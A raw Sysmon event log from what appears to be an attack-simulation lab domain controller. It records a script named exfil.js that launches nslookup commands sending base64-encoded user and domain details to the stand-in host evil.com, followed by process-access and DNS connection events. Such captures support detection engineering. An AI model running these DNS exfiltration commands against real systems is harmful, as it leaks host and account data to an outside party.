14:21:26.350{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.350{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-DB42-000000005F02}896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.350{2E1864BB-18E6-629A-D942-000000005F02}56283636C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-DB42-000000005F02}896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.361{2E1864BB-18E6-629A-DB42-000000005F02}896C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-D942-000000005F02}5628C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlznud.tmp 2>&1 10341000x8000000000000000207007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.334{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-DA42-000000005F02}6372C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.334{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-DA42-000000005F02}6372C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.334{2E1864BB-18E6-629A-DA42-000000005F02}63724860C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-D942-000000005F02}5628C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.319{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-DA42-000000005F02}6372C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.319{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.319{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.319{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.319{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.319{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-D942-000000005F02}5628C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.319{2E1864BB-18E0-629A-6742-000000005F02}39767860C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-D942-000000005F02}5628C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.324{2E1864BB-18E6-629A-D942-000000005F02}5628C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlznud.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.319{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbrj.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.272{2E1864BB-18E6-629A-D742-000000005F02}35526000C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-D842-000000005F02}4848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.272{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.272{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.272{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.272{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-D842-000000005F02}4848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.272{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.272{2E1864BB-18E6-629A-D642-000000005F02}19084052C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-D842-000000005F02}4848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.276{2E1864BB-18E6-629A-D842-000000005F02}4848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-D642-000000005F02}1908C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbrj.tmp 2>&1 354300x8000000000000000206987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.859{00000000-0000-0000-0000-000000000000}5740<unknown process>-udpfalsefalse127.0.0.1-50487-false127.0.0.1-53domain 354300x8000000000000000206986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.858{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50487- 354300x8000000000000000206985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.784{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62099-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.783{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62099-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.783{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50486- 354300x8000000000000000206982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.783{00000000-0000-0000-0000-000000000000}6092<unknown process>-udpfalsefalse127.0.0.1-50485-false127.0.0.1-53domain 354300x8000000000000000206981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.783{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50485- 354300x8000000000000000206980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.783{00000000-0000-0000-0000-000000000000}6092<unknown process>-udptruefalse127.0.0.1-50485-false127.0.0.1-53domain 354300x8000000000000000206979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.782{00000000-0000-0000-0000-000000000000}6092<unknown process>-udpfalsefalse127.0.0.1-50484-false127.0.0.1-53domain 354300x8000000000000000206978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.782{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50484- 354300x8000000000000000206977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.782{00000000-0000-0000-0000-000000000000}6092<unknown process>-udptruefalse127.0.0.1-50484-false127.0.0.1-53domain 354300x8000000000000000206976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.688{00000000-0000-0000-0000-000000000000}5060<unknown process>-udpfalsefalse127.0.0.1-50483-false127.0.0.1-53domain 354300x8000000000000000206975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.688{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62623-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.687{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62623-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.687{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50483- 354300x8000000000000000206972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.687{00000000-0000-0000-0000-000000000000}5060<unknown process>-udptruefalse127.0.0.1-50483-false127.0.0.1-53domain 354300x8000000000000000206971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.687{00000000-0000-0000-0000-000000000000}5060<unknown process>-udpfalsefalse127.0.0.1-50482-false127.0.0.1-53domain 354300x8000000000000000206970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.686{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50482- 354300x8000000000000000206969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.686{00000000-0000-0000-0000-000000000000}5060<unknown process>-udptruefalse127.0.0.1-50482-false127.0.0.1-53domain 354300x8000000000000000206968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.686{00000000-0000-0000-0000-000000000000}5060<unknown process>-udpfalsefalse127.0.0.1-50481-false127.0.0.1-53domain 354300x8000000000000000206967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.685{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50481- 354300x8000000000000000206966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.685{00000000-0000-0000-0000-000000000000}5060<unknown process>-udptruefalse127.0.0.1-50481-false127.0.0.1-53domain 354300x8000000000000000206965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.621{00000000-0000-0000-0000-000000000000}5696<unknown process>-udpfalsefalse127.0.0.1-50480-false127.0.0.1-53domain 354300x8000000000000000206964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.621{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62455-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.619{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT 